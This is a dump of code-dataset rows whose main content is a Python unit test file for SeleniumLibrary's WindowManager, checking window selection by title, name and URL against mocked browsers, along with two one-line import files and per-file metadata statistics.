| 42.242066 | 171 | 0.62649 | 7,485 | 67,883 | 5.574215 | 0.062926 | 0.027563 | 0.025406 | 0.027419 | 0.8195 | 0.768952 | 0.750929 | 0.738298 | 0.704096 | 0.694677 | 0 | 0.003572 | 0.302992 | 67,883 | 1,606 | 172 | 42.268369 | 0.878242 | 0.189149 | 0 | 0.58147 | 0 | 0 | 0.052172 | 0.001797 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007987 | false | 0 | 0.091054 | 0 | 0.169329 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed83ab2e71ee7220d989616ffae7cf8a3b26b989 | 15,088 | py | Python | test/unit/locators/test_windowmanager.py | ponkar/robotframework-selenium2library | e41b6ea6664fe80f469ac7c5dfd9717819b97d18 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/locators/test_windowmanager.py | ponkar/robotframework-selenium2library | e41b6ea6664fe80f469ac7c5dfd9717819b97d18 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/locators/test_windowmanager.py | ponkar/robotframework-selenium2library | e41b6ea6664fe80f469ac7c5dfd9717819b97d18 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import unittest
import uuid
from mockito import mock, unstub
from SeleniumLibrary.locators.windowmanager import WindowManager
class WindowManagerTests(unittest.TestCase):
def test_select_with_invalid_prefix(self):
manager = WindowManager()
browser = mock()
with self.assertRaises(ValueError) as err:
manager.select(browser, "something=test1")
self.assertEqual(
str(err),
"Window locator with prefix 'something' is not supported"
)
unstub()
def test_select_with_null_browser(self):
manager = WindowManager()
with self.assertRaises(AssertionError):
manager.select(None, "name=test1")
unstub()
def test_select_by_title(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "title=Title 2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_title_sloppy_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "title= tItLe 2 ")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_title_with_multiple_matches(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2a', 'title': "Title 2", 'url': 'http://localhost/page2a.html'},
{'name': 'win2b', 'title': "Title 2", 'url': 'http://localhost/page2b.html'})
manager.select(browser, "title=Title 2")
self.assertEqual(browser.current_window.name, 'win2a')
unstub()
def test_select_by_title_no_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
with self.assertRaises(ValueError) as err:
manager.select(browser, "title=Title -1")
self.assertEqual(
str(err),
"Unable to locate window with title 'Title -1'"
)
unstub()
def test_select_by_name(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_name_sloppy_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name= win2 ")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_name_with_bad_case(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=Win2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_name_no_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
with self.assertRaises(ValueError) as err:
manager.select(browser, "name=win-1")
self.assertEqual(str(err), "Unable to locate window with name 'win-1'")
unstub()
def test_select_by_url(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "url=http://localhost/page2.html")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_url_sloppy_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "url= http://LOCALHOST/page2.html ")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_url_with_multiple_matches(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2a', 'title': "Title 2a", 'url': 'http://localhost/page2.html'},
{'name': 'win2b', 'title': "Title 2b", 'url': 'http://localhost/page2.html'})
manager.select(browser, "url=http://localhost/page2.html")
self.assertEqual(browser.current_window.name, 'win2a')
unstub()
def test_select_by_url_no_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'}
)
with self.assertRaises(ValueError) as err:
manager.select(browser, "url=http://localhost/page-1.html")
self.assertEqual(
str(err),
(
"Unable to locate window with URL "
"'http://localhost/page-1.html'"
)
)
unstub()
def test_select_with_null_locator(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'}
)
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, None)
self.assertEqual(browser.current_window.name, 'win1')
unstub()
def test_select_with_null_string_locator(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, "null")
self.assertEqual(browser.current_window.name, 'win1')
unstub()
def test_select_with_empty_locator(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, "")
self.assertEqual(browser.current_window.name, 'win1')
unstub()
def test_select_with_main_constant_locator(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, "main")
self.assertEqual(browser.current_window.name, 'win1')
unstub()
def test_select_by_default_with_name(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "win2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_default_with_title(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "Title 2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_select_by_default_no_match(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
self.assertRaises(ValueError, manager.select, browser, "win-1")
unstub()
def test_select_with_sloppy_prefix(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
manager.select(browser, "name=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, "nAmE=win2")
self.assertEqual(browser.current_window.name, 'win2')
manager.select(browser, " name =win2")
self.assertEqual(browser.current_window.name, 'win2')
unstub()
def test_get_window_ids(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'id': 'win_id1', 'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'id': 'win_id2', 'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
self.assertEqual(
manager.get_window_ids(browser),
['win_id1', 'win_id2', 'undefined']
)
unstub()
def test_get_window_names(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
self.assertEqual(
manager.get_window_names(browser),
['win1', 'win2', 'win3']
)
unstub()
def test_get_window_titles(self):
manager = WindowManager()
browser = self._make_mock_browser(
{'name': 'win1', 'title': "Title 1", 'url': 'http://localhost/page1.html'},
{'name': 'win2', 'title': "Title 2", 'url': 'http://localhost/page2.html'},
{'name': 'win3', 'title': "Title 3", 'url': 'http://localhost/page3.html'})
self.assertEqual(
manager.get_window_titles(browser),
['Title 1', 'Title 2', 'Title 3']
)
unstub()
def _make_mock_browser(self, *window_specs):
browser = mock()
current_window = mock()
browser.window_handles = []
window_infos = {}
for window_spec in window_specs:
handle = uuid.uuid4().hex
browser.window_handles.append(handle)
id_ = window_spec.get('id')
if not id_:
id_ = 'undefined'
window_info = [
id_,
window_spec.get('name'),
window_spec.get('title'),
window_spec.get('url')
]
window_infos[handle] = window_info
def window(handle_):
if handle_ in browser.window_handles:
browser.session_id = handle_
current_window.name = window_infos[handle_][1]
browser.current_window = current_window
browser.title = window_infos[handle_][2]
browser.current_url = window_infos[handle_][3]
switch_to = mock()
switch_to.window = window
browser.switch_to = switch_to
def execute_script(script):
handle_ = browser.session_id
if handle_ in browser.window_handles:
return window_infos[handle_][:2]
browser.execute_script = execute_script
return browser
| 43.481268 | 104 | 0.571911 | 1,654 | 15,088 | 5.05925 | 0.062878 | 0.088432 | 0.141491 | 0.065249 | 0.858509 | 0.833533 | 0.792543 | 0.790511 | 0.784536 | 0.772586 | 0 | 0.02405 | 0.253181 | 15,088 | 346 | 105 | 43.606936 | 0.718584 | 0 | 0 | 0.640411 | 0 | 0 | 0.277704 | 0 | 0 | 0 | 0 | 0 | 0.119863 | 1 | 0.09589 | false | 0 | 0.013699 | 0 | 0.119863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
71eb801b18973cbba0355b36453751501e16172c | 40 | py | Python | tests/unit/test_fetch_screen.py | BGASM/pyentrez | 72eeced35c888726210e9cd68885b409d1b489ce | [
"MIT"
] | null | null | null | tests/unit/test_fetch_screen.py | BGASM/pyentrez | 72eeced35c888726210e9cd68885b409d1b489ce | [
"MIT"
] | 34 | 2020-11-22T19:08:56.000Z | 2020-12-10T18:47:06.000Z | tests/unit/test_fetch_screen.py | BGASM/pyEntrez | 72eeced35c888726210e9cd68885b409d1b489ce | [
"MIT"
] | null | null | null | from pyentrez.main import fetch_screen
| 13.333333 | 38 | 0.85 | 6 | 40 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 40 | 2 | 39 | 20 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
71f624bbf26e0e904063892d868b7147c5a90f39 | 24 | py | Python | furnace/seg_opr/__init__.py | Yongjin-colin-choi/TorchSemiSeg | 8e2bacfd76ee8ab7c7e5c8e37ce4a4fcb0ef6371 | [
"MIT"
] | 1,439 | 2019-01-23T08:40:57.000Z | 2022-03-31T14:02:22.000Z | furnace/seg_opr/__init__.py | happog/TorchSeg | c5d370778349d9438ed8c854f267d3ba11ffd72f | [
"MIT"
] | 112 | 2019-01-25T02:31:26.000Z | 2021-09-23T08:42:37.000Z | furnace/seg_opr/__init__.py | happog/TorchSeg | c5d370778349d9438ed8c854f267d3ba11ffd72f | [
"MIT"
] | 287 | 2019-01-23T10:39:37.000Z | 2022-03-17T13:31:16.000Z | from .seg_oprs import *
| 12 | 23 | 0.75 | 4 | 24 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.